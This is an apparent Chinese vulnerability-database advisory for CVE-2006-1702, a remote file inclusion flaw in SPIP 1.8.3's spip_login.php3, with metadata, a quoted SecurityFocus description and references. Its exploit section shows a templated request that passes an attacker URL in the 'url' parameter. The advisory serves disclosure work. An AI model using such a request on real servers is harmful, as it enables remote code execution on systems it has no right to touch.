SPIP Spip_login.PHP3 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110034 漏洞类型 输入验证
发布时间 2006-04-10 更新时间 2006-04-14
CVE编号 CVE-2006-1702 CNNVD-ID CNNVD-200604-139
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27589
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-139
|漏洞详情
SPIP1.8.3中的spip_login.php3存在PHP远程文件包含漏洞。这使得远程攻击者可以借助于url参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/17423/info

SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[spip_dir]/spip_login.php3?url=[Evil_url]
|参考资料

来源:BID
名称:17423
链接:http://www.securityfocus.com/bid/17423
来源:BUGTRAQ
名称:20060409VulnerabilitiesinSPIP
链接:http://www.securityfocus.com/archive/1/archive/1/430443/100/0/threaded
来源:XF
名称:spip-spiplogin-file-include(25711)
链接:http://xforce.iss.net/xforce/xfdb/25711